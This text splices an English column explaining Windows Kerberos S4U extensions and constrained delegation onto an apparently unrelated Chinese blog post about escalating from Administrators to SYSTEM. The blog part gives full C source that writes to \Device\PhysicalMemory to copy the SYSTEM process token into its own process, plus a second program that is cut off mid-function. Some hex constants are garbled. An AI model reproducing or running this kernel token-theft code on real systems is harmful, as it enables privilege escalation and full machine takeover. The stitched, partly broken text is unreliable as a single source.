Building
Web sites that provide services external to the corporate firewall is
tricky. Usually it’s not desirable to grant corporate domain accounts
to external clients, and from a purely practical standpoint Kerberos
does not work well over the Internet due to the typical configuration
of client-side firewalls. This means that the site has to provide some
form of authentication and authorization that is different from the
methods built into Windows®.

To help deal with this and the other
challenges I’ll describe, Microsoft has implemented two extensions to
Kerberos designed for use on servers. These extensions are collectively
called Service-for-User (S4U). The goal is to allow server developers
to program against the built-in security model that Windows provides,
making use of the group-based authorization framework that
administrators are already familiar with.

This column assumes a basic familiarity with Kerberos. For an online primer, see "Exploring Kerberos, the Protocol for Distributed Security in Windows 2000" in the August 1999 issue of Microsoft Systems Journal. For a more detailed explanation, see the book Programming Windows Security (Addison-Wesley, 2000). For the spec, see RFC 1510 at the IETF site (http://www.ietf.org/rfc/rfc1510.txt).

Discovering Authorization Information

The
first extension I’ll introduce helps a server discover the groups that
a domain user belongs to. The authorization framework in Windows has
become so complicated that it’s virtually impossible for a server
developer to manually discover the groups for a user. Global groups
come from the user’s home domain and may be nested. Universal groups
can come from all over the user’s home forest, are stored in the global
catalog, and may be nested as well. Domain local groups are stored in
the server’s domain and may be nested. Local groups are stored on the
server machine and are the easiest of the bunch to deal with. The
SIDHistory feature in Windows 2000 means the resulting group expansion
may need to be done multiple times for some users. Another feature
called domain quarantine might mean removing some groups. Simply put,
trying to manually figure out the group membership of a domain user is
a developer’s worst nightmare, and should be avoided.

The best
way to get an authoritative list of groups for a user is to establish a
logon for that user and look at the resulting token. During Kerberos
authentication, the domain controllers perform all the heavy lifting.
The only problem is, to perform Kerberos authentication on a client’s
behalf, the server needs to have the client’s primary credentials,
which basically means having access to the client’s password or the
client’s ticket-granting ticket (TGT) and the corresponding session
key. If the server knew the client’s password, here’s how simple it
would be to get a token for a client named Alice, in the domain sales:

HANDLE hToken;
if (LogonUser("alice", "sales", alicesPassword, LOGON32_LOGON_NETWORK,
              0, &hToken)) {
  // hToken holds a token with all of Alice's groups
}

The obvious problem here is that the server must know the client’s password, which is a severe breach of trust.
S4U2Self

The
S4U solution in this case is for the server to go through the motions
of Kerberos authentication and obtain a logon for the client, but
without providing the client’s credentials. Thus, you’re not really
authenticating the client in this case, only making the rounds to
collect the group security identifiers (SIDs) for the client. To allow
this to occur, Windows Server 2003 domain controllers accept a new type
of Kerberos request, where the service requests a ticket from the
client to itself, presenting its own credentials instead of the
client’s. This extension is called Service-for-User-to-Self (S4U2Self).

If
the client and the service are in separate domains, this requires a
bidirectional trust path between them because the service, acting on
the client’s behalf, must request tickets from the client’s domain.

While
the wire-level details are all rather complicated, the service
developer need only call one function to start the ball rolling:
LsaLogonUser. In spirit, this is similar to calling LogonUser as I have
shown earlier, but without needing to provide the client’s password.
The result is a token that the service can use with functions like
AccessCheck and CheckTokenMembership, as well as the new AuthZ family
of authorization functions. This allows the service to perform access
checks against security descriptors for objects that it manages.

To
protect the client, LsaLogonUser normally returns a token with a
special restriction. The token will have an impersonation level of
Identify, which means that the service will not be able to open kernel
objects while impersonating the client using this token. However, for
services that are part of the trusted computing base (TCB)—for example,
a service running as SYSTEM—LsaLogonUser will return a token with an
impersonation level of Impersonate, allowing access to local kernel
objects using the client’s identity. This prevents an untrusted service
from using an S4U2Self ticket to elevate its own local privileges.

Developers
who want to use this feature need only call LsaLogonUser. However,
LsaLogonUser is a difficult function to use. It expects 14 arguments,
some of which are pointers to variable-length structures or handles to
things that need opening first. Version 1.1 of the Microsoft® .NET
Framework (in beta as of this writing) includes a new constructor on
the WindowsIdentity class that tremendously simplifies this:

public WindowsIdentity(string userPrincipalName);

Figure 1 shows some sample C++ code that calls LsaLogonUser directly, requesting an S4U2Self logon.

The Problem of Delegation

Delegation
is another problem that has plagued developers. Even when a client is
able to use Kerberos to authenticate with a service, the client’s
security context given to the service does not normally contain the
client’s network credentials. Imagine what could happen without this
protection: a service, which may or may not be trusted in its own
domain, could use a client’s credentials from another domain to access
resources it would normally not be able to access on its own. No client
would ever want to use such a service, unless that service was highly
trusted.

Windows 2000 introduced a feature called unconstrained
delegation that allowed clients to delegate credentials to certain
services that were designated as "trusted for delegation." In this
case, unconstrained means that the service could use these delegated
credentials anywhere on the network, all day long. Very few
organizations actually used this feature, however, for two reasons.
First, compromise of a service trusted for delegation means compromise
of all the delegated credentials it holds, making it a virtual honeypot
for attackers. Second, the local administrator of such a service must
be highly trusted, lest he elevate his own privileges by misusing
client credentials on the network. It was clear that this feature would
be used only in a handful of rare situations.

Constrained Delegation or S4U2Proxy

The
Active Directory® implementation in Windows Server 2003 has matured
significantly since Windows 2000, and it supports a more reasonable
delegation model known as constrained delegation. The idea is that a
service may be allowed to delegate client credentials, but domain
controllers will be much more selective about issuing such credentials.
Thus, when service A requests Kerberos tickets for service B using
delegated client credentials, the domain will consult a list to see if
service A is allowed to delegate credentials to service B. In other
words, the network administrator can control the scope of delegation.

Figure 2 Constrained Delegation

An
example of this would be a COM+ service hosting business logic. The
service might need to access a remote database using the client’s
credentials. The network administrator can grant limited delegation
privileges to the COM+ service, allowing it to delegate only to the
database service. Figure 2 shows how this
can be configured with the Active Directory Users and Computers tool.
In this case, the COM+ service runs under the built-in Network Service
account on a machine called AppServer, and the remote database is on a
machine called DataServer. Contrast this to Windows 2000, where the
only choice for delegation was a checkbox that turned unconstrained
delegation on or off, as shown in Figure 3.

Figure 3 Unconstrained Delegation

Kerberos,
as defined by RFC 1510, does provide a constrained delegation feature
known as a proxy ticket, but the client must request these tickets on
the service’s behalf. The Microsoft extension to Kerberos, known as
S4U2Proxy (Service-for-User-to-Proxy), allows the service to obtain
tickets on the client’s behalf based on configuration settings in
Active Directory. With S4U2Proxy, a service can obtain tickets to some
other service (the proxy) for a user. This means the client must trust
the directory (and its administrators) because the client no longer has
control over whether her credentials may be delegated.

Technically,
the biggest difference between normal Kerberos proxy delegation and
S4U2Proxy is that in standard Kerberos the client’s TGT is required to
obtain proxy tickets. In S4U2Proxy, since the service is requesting the
tickets on the client’s behalf and the service does not have the
client’s TGT, the service submits a service ticket instead, which will
be either the ticket the client presented to the service during normal
Kerberos authentication or a ticket obtained on the client’s behalf via
S4U2Self. In the latter case, the client may not even have been
authenticated using Kerberos, which may seem a bit odd. This particular
case is known as protocol transition.

Protocol Transition

A
common problem with externally facing services in Windows 2000 is
client authentication and authorization. Since Kerberos authentication
isn’t usually an option over the Internet, these services must often
use other authentication techniques such as Secure Sockets Layer (SSL)
with client certificates, hand-rolled forms-based solutions, Microsoft
Passport, or other proprietary authentication protocols such as SecurID
from RSA Security. Once the service determines the client’s identity,
the challenge is to convert this knowledge into real Windows
credentials that can be used to access local resources and remote
services on the client’s behalf.

Once again, there are two
solutions to this problem in Windows 2000: either the service knows the
password for an account representing the client and uses this password
to obtain a Kerberos logon, or the service must scrape through Active
Directory manually to figure out the group memberships for the user.
Because the service couldn’t use Kerberos to authenticate its client,
it is effectively penalized by not being able to easily make
authorization decisions based on settings in Active Directory.

Protocol
Transition uses both of the S4U Kerberos extensions I’ve described to
make it possible for a service in this position to transition from a
proprietary authentication protocol to the Microsoft Kerberos
implementation on the back end. Figure 4 shows what protocol transition looks like.

Figure 4 Protocol Transitioning

Developers
can use this technique by authenticating the client using whatever
technique makes sense, then calling LsaLogonUser to obtain a token for
the user via the S4U2Self extension that I discussed earlier. The
developer writes code to impersonate the resulting token and makes
authenticated requests to any of the back-end services to which it is
allowed to delegate. The back-end services will think the client is
accessing them—not the front-end service—and will receive a security
context for the client, along with all groups and privileges that the
client would have if she had authenticated directly with the back-end
service. Thus the front-end server acts as a trusted point of
authentication protocol transition. The network administrator controls
which back-end services trust the front-end service via the constrained
delegation settings in Active Directory.

Note that the network
administrator must explicitly allow the server to use protocol
transition by granting constrained delegation using "any authentication
protocol" on the front end.

Controls and Limitations

Impersonation
and delegation of a client’s credentials is a sensitive matter, and
several controls are maintained in Active Directory to prevent abuse of
these extensions. A service that wants to use S4U2Self to obtain a
token for a client must be granted permission to enumerate the groups
for that client. The network administrator controls this permission via
the access control list on the Active Directory user object attribute
known as Token-Groups-Global-And-Universal, which isn’t accessible via
the Active Directory Users and Computers snap-in, but can be accessed
interactively using ADSIEdit or programmatically via ADSI.

When a
service requests an S4U2Self ticket for a client, if protocol
transition has been enabled for that service in the directory, the
resulting ticket will have the forwardable flag set. This controls
whether the service can use this ticket to further obtain S4U2Proxy
tickets to delegate the client’s credentials to other services. If the
client’s account has been marked "Sensitive and cannot be delegated,"
the forwardable flag will not be set, and delegation will not be
allowed. Even if the forwardable flag is set, S4U2Proxy tickets will
only be issued for services that the requesting service is allowed to
delegate to (refer back to Figure 2 to take a look at the list in Active Directory).

S4U2Proxy
tickets will not work if the path from the client’s domain to the
target resource domain spans more than two forests. The reason for this
has to do with the way cross-forest security identifier filtering works.

As
I mentioned earlier, LsaLogonUser behaves differently depending on
whether the caller has the TCB privilege. If the caller enables the TCB
privilege before calling LsaLogonUser, it will return a token that can
be used to access local resources on the machine; otherwise, this will
be disallowed via the impersonation level on the token. This is
orthogonal to whether the forwardable flag is set, so technically you
can end up with a token that you can impersonate and use for delegation
to remote services, but while impersonating you will be denied access
to all local kernel objects. An example of this would be a service
running as NETWORK SERVICE (as opposed to SYSTEM) that has been granted
the right to use constrained delegation.

Note that for brevity
I’ve mentioned permissions that a service must be granted. What I mean
by this is that the account the service is running under must be
granted the permissions. For example, if the service is running as Bob,
Bob must be granted the permissions. More subtly, if the service is
running as NETWORK SERVICE or SYSTEM, it is running on behalf of the
machine itself, so the machine account must be granted the permissions.

Conclusion

Tightly
coupling authorization with authentication has been both a blessing and
a curse for Microsoft. The benefits are clear. As the client obtains
Kerberos tickets, domain controllers inject group SIDs into the
tickets, which eliminates the network round-trips that would be needed
to get to a separate authorization service. The administration model is
also simplified. The downside is that the only way to get authoritative
authorization information is via Kerberos authentication, and
extensions like these don’t make it any easier to interoperate with
other implementations of Kerberos. In addition, the bidirectional trust
that must be established between forests for these features to work
across forest boundaries is another potential stumbling block.

管理员组获取系统权限的完美解决方案



Author : ZwelL

Blog   : http://www.donews.net/zwell

Date   : 2005.4.28



    关于管理员组(administrators)获取系统(SYSTEM)权限的方法其实已经有很多种了.

小四哥就提到了一些:"MSDN系列(3)–Administrator用户直接获取SYSTEM权限"和"远程线程注入版获取SYSTEM权限".

这里,我先踩在前辈的肩上列一些可行的方法:



1. "利用ZwCreateToken()自己创建一个SYSTEM令牌(Token)"

2. HOOK掉创建进程的函数ZwCreateProcess(Ex),用winlogon ID 创建

3. 远线程插入，插入线程到系统进程，创建一新进程



这上面三种方法都是scz提到的,也存在一些问题.其实除此这外,我们还可以:

4. 将程序做成服务，带参数运行新进程



做为服务来讲就是SYSTEM了,再创建的进程也是SYSTEM权限.



当然,这里我都不会用到上面提到的方法.因为网上都能找到现成的实现代码.而且考虑一些复杂性以及存在的一些问题都不是很好的解决方案.



这里,我拿出两种新的方案来实现该功能:



第一种方法.我们先来看一下系统是如何进行权限检测的，

举个例子,在调用了OpenProcessToken,我们知道会进行权限的验证：

OpenProcessToken->NtOpenProcessToken－>PsOpenTokenOfProcess->PsReferencePrimaryToken->找到这一句Token = Process->Token;

                                    |->ObOpenObjectByPointer调用上面返回的TOKEN进行检查



也就是说，系统在检测权限时仅仅通过从进程的EPROCESS结构种拿出Token项进行操作.因此我们不需要继续往ObOpenObjectByPointer里面跟进了。

思路已经很明显：直接将System进程的Token拿过来，放到我们进程的Token位置。那么系统就认为我们是SYSTEM权限.

而这时我们的进程创建的子进程也就是SYSTEM权限了。(以上分析过程请参考WINDOWS源代码…^_^)



实现代码:

===========================================================================================================

#include<windows.h>

#include<stdio.h>

#include<Accctrl.h>

#include<Aclapi.h>



#define TOKEN_OFFSET 0xc8 //In windows 2003, it’s 0xc8, if others’ version, change it

#define NT_SUCCESS(Status)            ((NTSTATUS)(Status) >= 0)

#define STATUS_INFO_LENGTH_MISMATCH        ((NTSTATUS)0xC0000004L)

#define STATUS_ACCESS_DENIED ((NTSTATUS)0xC0000022L)



typedef LONG  NTSTATUS;

typedef struct _IO_STATUS_BLOCK

{

    NTSTATUS    Status;

    ULONG        Information;

} IO_STATUS_BLOCK, *PIO_STATUS_BLOCK;



typedef struct _UNICODE_STRING

{

    USHORT        Length;

    USHORT        MaximumLength;

    PWSTR        Buffer;

} UNICODE_STRING, *PUNICODE_STRING;



#define OBJ_INHERIT             0×00000002L

#define OBJ_PERMANENT           0×00000010L

#define OBJ_EXCLUSIVE           0×00000020L

#define OBJ_CASE_INSENSITIVE    0×00000040L

#define OBJ_OPENIF              0×00000080L

#define OBJ_OPENLINK            0×00000100L

#define OBJ_KERNEL_HANDLE       0×00000200L

#define OBJ_VALID_ATTRIBUTES    0×000003F2L



typedef struct _OBJECT_ATTRIBUTES

{

    ULONG        Length;

    HANDLE        RootDirectory;

    PUNICODE_STRING ObjectName;

    ULONG        Attributes;

    PVOID        SecurityDescriptor;

    PVOID        SecurityQualityOfService;

} OBJECT_ATTRIBUTES, *POBJECT_ATTRIBUTES;  



typedef struct _SYSTEM_MODULE_INFORMATION

{

    ULONG Reserved[2];

    PVOID Base;

    ULONG Size;

    ULONG Flags;

    USHORT Index;

    USHORT Unknown;

    USHORT LoadCount;

    USHORT ModuleNameOffset;

    CHAR ImageName[256];

} SYSTEM_MODULE_INFORMATION, *PSYSTEM_MODULE_INFORMATION;



typedef enum _SYSTEM_INFORMATION_CLASS

{

    SystemBasicInformation,

    SystemProcessorInformation,

    SystemPerformanceInformation,

    SystemTimeOfDayInformation,

    SystemNotImplemented1,

    SystemProcessesAndThreadsInformation,

    SystemCallCounts,

    SystemConfigurationInformation,

    SystemProcessorTimes,

    SystemGlobalFlag,

    SystemNotImplemented2,

    SystemModuleInformation,

    SystemLockInformation,

    SystemNotImplemented3,

    SystemNotImplemented4,

    SystemNotImplemented5,

    SystemHandleInformation,

    SystemObjectInformation,

    SystemPagefileInformation,

    SystemInstructionEmulationCounts,

    SystemInvalidInfoClass1,

    SystemCacheInformation,

    SystemPoolTagInformation,

    SystemProcessorStatistics,

    SystemDpcInformation,

    SystemNotImplemented6,

    SystemLoadImage,

    SystemUnloadImage,

    SystemTimeAdjustment,

    SystemNotImplemented7,

    SystemNotImplemented8,

    SystemNotImplemented9,

    SystemCrashDumpInformation,

    SystemExceptionInformation,

    SystemCrashDumpStateInformation,

    SystemKernelDebuggerInformation,

    SystemContextSwitchInformation,

    SystemRegistryQuotaInformation,

    SystemLoadAndCallImage,

    SystemPrioritySeparation,

    SystemNotImplemented10,

    SystemNotImplemented11,

    SystemInvalidInfoClass2,

    SystemInvalidInfoClass3,

    SystemTimeZoneInformation,

    SystemLookasideInformation,

    SystemSetTimeSlipEvent,

    SystemCreateSession,

    SystemDeleteSession,

    SystemInvalidInfoClass4,

    SystemRangeStartInformation,

    SystemVerifierInformation,

    SystemAddVerifier,

    SystemSessionProcessesInformation

} SYSTEM_INFORMATION_CLASS;



typedef NTSTATUS ( __stdcall *ZWQUERYSYSTEMINFORMATION )

(

IN SYSTEM_INFORMATION_CLASS SystemInformationClass,

IN OUT PVOID SystemInformation,

IN ULONG SystemInformationLength,

OUT PULONG ReturnLength OPTIONAL

);



typedef NTSTATUS (CALLBACK* ZWOPENSECTION)(

    OUT PHANDLE  SectionHandle,

    IN  ACCESS_MASK  DesiredAccess,

    IN  POBJECT_ATTRIBUTES  ObjectAttributes

    );



typedef VOID (CALLBACK* RTLINITUNICODESTRING)(                

    IN OUT PUNICODE_STRING  DestinationString,

    IN PCWSTR  SourceString

    );



typedef struct _SYSTEM_HANDLE_INFORMATION

{

    ULONG            ProcessId;

    UCHAR            ObjectTypeNumber;

    UCHAR            Flags;

    USHORT            Handle;

    PVOID            Object;

    ACCESS_MASK        GrantedAccess;

} SYSTEM_HANDLE_INFORMATION, *PSYSTEM_HANDLE_INFORMATION;



RTLINITUNICODESTRING        RtlInitUnicodeString;

ZWOPENSECTION            ZwOpenSection;

ZWQUERYSYSTEMINFORMATION    ZwQuerySystemInformation = NULL;

HMODULE    g_hNtDLL = NULL;

PVOID     g_pMapPhysicalMemory = NULL;

HANDLE     g_hMPM     = NULL;



BOOL InitNTDLL()

{

    g_hNtDLL = LoadLibrary( "ntdll.dll" );

    if ( !g_hNtDLL )

    {

        return FALSE;

    }



    RtlInitUnicodeString =

        (RTLINITUNICODESTRING)GetProcAddress( g_hNtDLL, "RtlInitUnicodeString");



    ZwOpenSection =

        (ZWOPENSECTION)GetProcAddress( g_hNtDLL, "ZwOpenSection");



    ZwQuerySystemInformation =

        ( ZWQUERYSYSTEMINFORMATION )GetProcAddress( g_hNtDLL, "ZwQuerySystemInformation" );



    ZwQuerySystemInformation =

        ( ZWQUERYSYSTEMINFORMATION )GetProcAddress( g_hNtDLL, "ZwQuerySystemInformation" );



    return TRUE;

}



VOID CloseNTDLL()

{

    if(g_hNtDLL != NULL)

    {

        FreeLibrary(g_hNtDLL);

    }

}



VOID SetPhyscialMemorySectionCanBeWrited(HANDLE hSection)

{



    PACL pDacl=NULL;

    PACL pNewDacl=NULL;

    PSECURITY_DESCRIPTOR pSD=NULL;

    DWORD dwRes;

    EXPLICIT_ACCESS ea;



    if(dwRes=GetSecurityInfo(hSection,SE_KERNEL_OBJECT,DACL_SECURITY_INFORMATION,

        NULL,NULL,&pDacl,NULL,&pSD)!=ERROR_SUCCESS)

    {

        goto CleanUp;

    }



    ZeroMemory(&ea, sizeof(EXPLICIT_ACCESS));

    ea.grfAccessPermissions = SECTION_MAP_WRITE;

    ea.grfAccessMode = GRANT_ACCESS;

    ea.grfInheritance= NO_INHERITANCE;

    ea.Trustee.TrusteeForm = TRUSTEE_IS_NAME;

    ea.Trustee.TrusteeType = TRUSTEE_IS_USER;

    ea.Trustee.ptstrName = "CURRENT_USER";





    if(dwRes=SetEntriesInAcl(1,&ea,pDacl,&pNewDacl)!=ERROR_SUCCESS)

    {

        goto CleanUp;

    }



    if(dwRes=SetSecurityInfo(hSection,SE_KERNEL_OBJECT,DACL_SECURITY_INFORMATION,NULL,NULL,pNewDacl,NULL)!=ERROR_SUCCESS)

    {

        goto CleanUp;

    }



CleanUp:



    if(pSD)

        LocalFree(pSD);

    if(pNewDacl)

        LocalFree(pNewDacl);

}



HANDLE OpenPhysicalMemory()

{

    NTSTATUS        status;

    UNICODE_STRING        physmemString;

    OBJECT_ATTRIBUTES    attributes;



    RtlInitUnicodeString( &physmemString, L"\\Device\\PhysicalMemory" );



    attributes.Length            = sizeof(OBJECT_ATTRIBUTES);

    attributes.RootDirectory        = NULL;

    attributes.ObjectName            = &physmemString;

    attributes.Attributes            = 0;

    attributes.SecurityDescriptor        = NULL;

    attributes.SecurityQualityOfService    = NULL;



    status = ZwOpenSection(&g_hMPM,SECTION_MAP_READ|SECTION_MAP_WRITE,&attributes);



    if(status == STATUS_ACCESS_DENIED){

        status = ZwOpenSection(&g_hMPM,READ_CONTROL|WRITE_DAC,&attributes);

        SetPhyscialMemorySectionCanBeWrited(g_hMPM);

        CloseHandle(g_hMPM);

        status =ZwOpenSection(&g_hMPM,SECTION_MAP_READ|SECTION_MAP_WRITE,&attributes);

    }



    if( !NT_SUCCESS( status ))

    {

        return NULL;

    }



    g_pMapPhysicalMemory = MapViewOfFile(

        g_hMPM,

        4,

        0,

        0×30000,

        0×1000);

    if( g_pMapPhysicalMemory == NULL )

    {

        return NULL;

    }



    return g_hMPM;

}



PVOID LinearToPhys(PULONG BaseAddress,PVOID addr)

{

    ULONG VAddr=(ULONG)addr,PGDE,PTE,PAddr;

    if(VAddr>=0×80000000 && VAddr<0xa0000000)

    {

        PAddr=VAddr-0×80000000;

        return (PVOID)PAddr;

    }

    PGDE=BaseAddress[VAddr>>22];

    if ((PGDE&1)!=0)

    {

        ULONG tmp=PGDE&0×00000080;

        if (tmp!=0)

        {

            PAddr=(PGDE&0xFFC00000)+(VAddr&0×003FFFFF);

        }

        else

        {

            PGDE=(ULONG)MapViewOfFile(g_hMPM, FILE_MAP_ALL_ACCESS, 0, PGDE & 0xfffff000, 0×1000);

            PTE=((PULONG)PGDE)[(VAddr&0x003FF000)>>12];

            if ((PTE&1)!=0)

            {

                PAddr=(PTE&0xFFFFF000)+(VAddr&0×00000FFF);

                UnmapViewOfFile((PVOID)PGDE);

            }

            else return 0;

        }

    }

    else return 0;



    return (PVOID)PAddr;

}







ULONG GetData(PVOID addr)

{

    ULONG phys=(ULONG)LinearToPhys((PULONG)g_pMapPhysicalMemory,(PVOID)addr);

    PULONG tmp=(PULONG)MapViewOfFile(g_hMPM, 4, 0, phys & 0xfffff000, 0×1000);

    if (tmp==0)

        return 0;

    ULONG ret=tmp[(phys & 0xFFF)>>2];

    UnmapViewOfFile(tmp);

    return ret;

}



BOOL SetData(PVOID addr,ULONG data)

{

    ULONG phys=(ULONG)LinearToPhys((PULONG)g_pMapPhysicalMemory,(PVOID)addr);

    PULONG tmp=(PULONG)MapViewOfFile(g_hMPM, FILE_MAP_WRITE, 0, phys & 0xfffff000, 0×1000);

    if (tmp==0)

        return FALSE;

    tmp[(phys & 0xFFF)>>2]=data;

    UnmapViewOfFile(tmp);

    return TRUE;

}



DWORD MyGetModuleBaseAddress( char * pModuleName)

{

    PSYSTEM_MODULE_INFORMATION    pSysModule;    



    ULONG            uReturn;

    ULONG            uCount;

    PCHAR            pBuffer = NULL;

    PCHAR            pName    = NULL;

    NTSTATUS        status;

    UINT            ui;

    CHAR            szBuffer[10];

    DWORD            pBaseAddress;



    status = ZwQuerySystemInformation( SystemModuleInformation, szBuffer, 10, &uReturn );

    pBuffer = ( PCHAR )malloc(uReturn);

    if ( pBuffer )

    {

        status = ZwQuerySystemInformation( SystemModuleInformation, pBuffer, uReturn, &uReturn );

        if( NT_SUCCESS(status) )

        {

            uCount = ( ULONG )*( ( ULONG * )pBuffer );

            pSysModule = ( PSYSTEM_MODULE_INFORMATION )( pBuffer + sizeof( ULONG ) );

            for ( ui = 0; ui < uCount; ui++ )

            {

                pName = strstr( pSysModule->ImageName, pModuleName );

                if( pName )

                {

                    pBaseAddress = (DWORD)pSysModule->Base;

                    free( pBuffer );

                    return pBaseAddress;

                }

                pSysModule ++;

            }

        }



        free( pBuffer );

    }



    return NULL;

}



DWORD GetEprocessFromId (DWORD PID)

{

    NTSTATUS                     status;

    PVOID                        buf   = NULL;

    ULONG                        size  = 1;

    ULONG                        NumOfHandle = 0;

    ULONG                        i;

    PSYSTEM_HANDLE_INFORMATION    h_info  = NULL;

    DWORD    n;

    DWORD    retvalue=0;



    buf=malloc(0×1000);

    if(buf == NULL)

    {

        printf("malloc wrong\n");

        return FALSE;

    }

    status = ZwQuerySystemInformation( SystemHandleInformation, buf, 0×1000, &n );

    if(STATUS_INFO_LENGTH_MISMATCH == status)

    {

        free(buf);

        buf=malloc(n);

        if(buf == NULL)

        {

            printf("malloc wrong\n");

            return FALSE;

        }

        status = ZwQuerySystemInformation( SystemHandleInformation, buf, n, NULL);

    }

    else

    {

        printf("ZwQuerySystemInformation wrong\n");

        return FALSE;

    }



    NumOfHandle = *(ULONG*)buf;



    h_info = ( PSYSTEM_HANDLE_INFORMATION )((ULONG)buf+4);



    for(i = 0; i<NumOfHandle ;i++)

    {

            if( h_info[i].ProcessId == PID &&( h_info[i].ObjectTypeNumber == 5  ))

            {

                retvalue=(DWORD)(h_info[i].Object);

                break;

            }

    }



    if ( buf != NULL )

    {

        free( buf );

    }

    return retvalue;

}



void usage(char *exe)

{

    printf("Usage : %s [exefile|-h]\n");

}



int main(int argc, char **argv)

{

    HMODULE hDll;

    DWORD tmp;

    DWORD SystemEprocess;

    DWORD SystemEprocessTokenValue;

    DWORD CurrentEprocess;

    DWORD CurrentEprocessTokenValue;



    printf("\nIt is intended to get SYSTEM privilege from administrators group.\n");

    printf("\tMade by ZwelL.\n");

    printf("\tZwell@sohu.com.\n");

    printf("\thttp://www.donews.net/zwell.\n");

    printf("\tType -h to get more information\n", argv[0]);



    if( argc>=2)

    {

        if(

            ( (strcmp(argv[1],"-h")==0) && (argc==2))

            || (argc>2)

          )

        {

            usage(argv[0]);

            exit(-1);

        }

    }



    if (!InitNTDLL())

    {

        printf("InitNTDLL wrong\n");

        exit(-1);

    }



    if (OpenPhysicalMemory()==0)

    {

        printf("OpenPhysicalMemory wrong\n");

        exit(-1);

    }



    hDll = LoadLibrary("ntoskrnl.exe");

    tmp = (DWORD)GetProcAddress(hDll, "PsInitialSystemProcess");

    tmp=MyGetModuleBaseAddress("ntoskrnl.exe")+(DWORD)tmp-(DWORD)hDll;

    SystemEprocess=GetData((PVOID)tmp);

    tmp=SystemEprocess+TOKEN_OFFSET; //SYSTEM’s Token address

    SystemEprocessTokenValue=GetData((PVOID)tmp);   //SYSTEM’s Token

    printf("System Process Token : 0x%08X\n", SystemEprocessTokenValue);



    OpenProcess( PROCESS_ALL_ACCESS,FALSE,GetCurrentProcessId() );

    CurrentEprocess = GetEprocessFromId(GetCurrentProcessId());

    CurrentEprocessTokenValue = GetData((PVOID)(CurrentEprocess+TOKEN_OFFSET));



    printf("Current EPROCESS : %08x\n", CurrentEprocess);

    printf("Current Process Token : %08x\nPress ENTER to continue…\n",

        CurrentEprocessTokenValue);

    //getchar();

    SetData((PVOID)(GetEprocessFromId(GetCurrentProcessId())+TOKEN_OFFSET), SystemEprocessTokenValue);

    printf("Current Process Token : %08x\n",

        GetData((PVOID)(GetEprocessFromId(GetCurrentProcessId())+TOKEN_OFFSET)));

    printf("Press ENTER to create process…\n");

    //getchar();



    if( GetData((PVOID)(CurrentEprocess+TOKEN_OFFSET))

        == GetData((PVOID)(SystemEprocess+TOKEN_OFFSET))  

        )

        // It is so surprised that SYSTEM’s Token always in changing.

        // So before create new process, we should ensure the TOKEN is all right

    {

        ShellExecute(NULL, "open", (argc==2)?argv[1]:"c:\\windows\\regedit.exe", NULL, NULL, SW_SHOWNORMAL);

    }

    UnmapViewOfFile(g_pMapPhysicalMemory);

    CloseHandle(g_hMPM);

    CloseNTDLL();



    return 0;

}







在上面的代码中,请将TOKEN_OFFSET改成你的系统版本的偏移值.我们也可以想像到由于是操作了系统的内核空间,搞不好会出现蓝屏现象(尽管机率很小).



=========================================================================================================

第二种方法，我们不自己创建进程，而是直接用System进程的Token来创建进程.看到这，大家可能又想到了远线程。

这里不是。我的思路是:配置好桌面(desktop),工作区间(WindowStation)等信息，最后调用CreateProcessAsUser来创建子进程。

用这种方法极为稳定。这里一些关于获取SID的代码可以看我前一段时间写的"一种新的穿透防火墙的数据传输技术".



下面是源代码,这段代码也实现了RUNAS的功能,有兴趣可以研究一下,大部分都来自MSDN:



#include <windows.h>

#include <stdio.h>

#include <Tlhelp32.h>

#include <AccCtrl.h>

#include <Aclapi.h>

#include <wtsapi32.h>



#pragma comment(lib, "wtsapi32")



HANDLE OpenSystemProcess()

{

    HANDLE hSnapshot = NULL;

    HANDLE hProc     = NULL;



    __try

    {

        // Get a snapshot of the processes in the system

        hSnapshot = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);

        if (hSnapshot == NULL)

        {

            printf("OpenSystemProcess CreateToolhelp32Snapshot Failed");

            __leave;

        }



        PROCESSENTRY32 pe32;

        pe32.dwSize = sizeof(pe32);



        // Find the "System" process

        BOOL fProcess = Process32First(hSnapshot, &pe32);

        while (fProcess && (lstrcmpi(pe32.szExeFile, TEXT("SYSTEM")) != 0))

            fProcess = Process32Next(hSnapshot, &pe32);

        if (!fProcess)

        {

            printf("OpenSystemProcess Not Found SYSTEM");

            __leave;    // Didn’t find "System" process

        }



        // Open the process with PROCESS_QUERY_INFORMATION access

        hProc = OpenProcess(PROCESS_QUERY_INFORMATION, FALSE,

            pe32.th32ProcessID);

        if (hProc == NULL)

        {

            printf("OpenSystemProcess OpenProcess Failed");

            __leave;

        }

    }

    __finally

    {

        // Cleanup the snapshot

       if (hSnapshot != NULL)

           CloseHandle(hSnapshot);

       return(hProc);

    }

}



BOOL EnablePrivilege (PCSTR name)

{

    HANDLE hToken;

    BOOL rv;

    

    TOKEN_PRIVILEGES priv = { 1, {0, 0, SE_PRIVILEGE_ENABLED} };

    LookupPrivilegeValue (

        0,

        name,

        &priv.Privileges[0].Luid

    );

    

    OpenProcessToken(

        GetCurrentProcess (),

        TOKEN_ADJUST_PRIVILEGES,

        &hToken

    );

    

    AdjustTokenPrivileges (

        hToken,

        FALSE,

        &priv,

        sizeof priv,

        0,

        0

    );

    rv = GetLastError () == ERROR_SUCCESS;

    

    CloseHandle (hToken);

    return rv;

}



#define chDIMOF(Array) (sizeof(Array) / sizeof(Array[0]))



BOOL ModifySecurity(HANDLE hProc, DWORD dwAccess)

{

    PACL pAcl        = NULL;

    PACL pNewAcl     = NULL;

    PACL pSacl       = NULL;

    PSID pSidOwner   = NULL;

    PSID pSidPrimary = NULL;

    BOOL fSuccess    = TRUE;



    PSECURITY_DESCRIPTOR pSD = NULL;



    __try

    {

        // Find the length of the security object for the kernel object

        DWORD dwSDLength;

        if (GetKernelObjectSecurity(hProc, DACL_SECURITY_INFORMATION, pSD, 0,

            &dwSDLength) || (GetLastError() != ERROR_INSUFFICIENT_BUFFER))

        {

            printf("ModifySecurity GetKernelObjectSecurity Size Failed");

            __leave;

        }



        // Allocate a buffer of that length

        pSD = LocalAlloc(LPTR, dwSDLength);

        if (pSD == NULL)

        {

            printf("ModifySecurity LocalAlloc Failed");

            __leave;

        }



        // Retrieve the kernel object

        if (!GetKernelObjectSecurity(hProc, DACL_SECURITY_INFORMATION, pSD,

            dwSDLength, &dwSDLength))

        {

            printf("ModifySecurity GetKernelObjectSecurity Failed");

            __leave;

        }



        // Get a pointer to the DACL of the SD

        BOOL fDaclPresent;

        BOOL fDaclDefaulted;

